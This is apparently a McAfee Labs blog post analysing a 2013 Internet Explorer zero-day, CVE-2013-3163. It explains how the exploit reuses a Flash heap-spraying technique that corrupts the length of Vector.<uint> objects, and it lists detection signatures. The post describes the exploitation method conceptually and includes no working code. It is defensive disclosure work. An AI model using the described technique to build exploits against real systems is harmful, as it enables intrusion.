New Zero-Day Attack Copies Earlier Flash Exploitation

Late on July 10, Microsoft released a blog post disclosing that they were aware of a zero-day attack in the wild. This attack exploits a previously unpatched Internet Explorer vulnerability (CVE-2013-3163). It’s interesting that the vulnerability was just patched in this month’s Patch Tuesday (July 9), which is perhaps only a coincidence. Although we do not know how long ago the attack began, we do have the official solution right now. (Apply the Microsoft patch if you haven’t done so.)

McAfee Labs rapidly responded to the threat. While digging into the exploitation process, we realized that this attack leverages the same exploitation technology that we were first to identify in an Adobe Flash zero-day attack in February. We call the new exploitation technology the Flash Vector exploitation. As highlighted in our blog post from February, we made a fairly accurate prediction:

More important, the technique looks like a common exploitation approach to Flash Player. The vulnerability actually doesn’t help much–just overwriting few bytes that are considered as a field of “element number” for a specific ActionScript object. These traits show that the exploitation technique is not limited to this particular Flash vulnerability; it may apply to other Flash or non-Flash vulnerabilities.

Both of these attacks leverage a weakness inside Flash Player’s custom heap management, especially, for the heap management of ActionScript “Vector.<>” objects. During our analysis, we also found some minor differences between these two attacks:

  • Because the trigger of the previous attack is a Flash vulnerability, the exploitation contains a step that frees the heap block (“leaving the hole”). In the second case, this step is not necessary because the trigger is an IE vulnerability. IE and Flash use different heap managements; thus IE can overwrite the memory bytes managed by Flash.
  • In the earlier exploitation, the zero day leveraged the “Vector.<Number>()” object and corrupted its length field. In the current case, the exploit leverages the “Vector.<uint>()” object (corrupting its length field as well). For example, the following code sprays a lot of “Vector.<uint>()” objects in the memory:

vector_spraying1

McAfee Labs has released a couple of UDS signatures to protect customers of our Network Security Platform against the IE vulnerability as well as the exploitation. Signature “UDS-HTTP: Microsoft Internet Explorer CBlockElement bdo element tag Use After Free Vulnerability I” addresses the vulnerability, and “UDS-HTTP: Microsoft Internet Explorer CVE-2013-3163 Flash Exploitation” handles the exploitation. Also, the generic buffer overflow prevention feature on our HIPS products will stop the related attacks.

The author would like to thank Bing Sun, Chong Xu, and Xiaoning Li (Intel Labs) for their help with the analysis.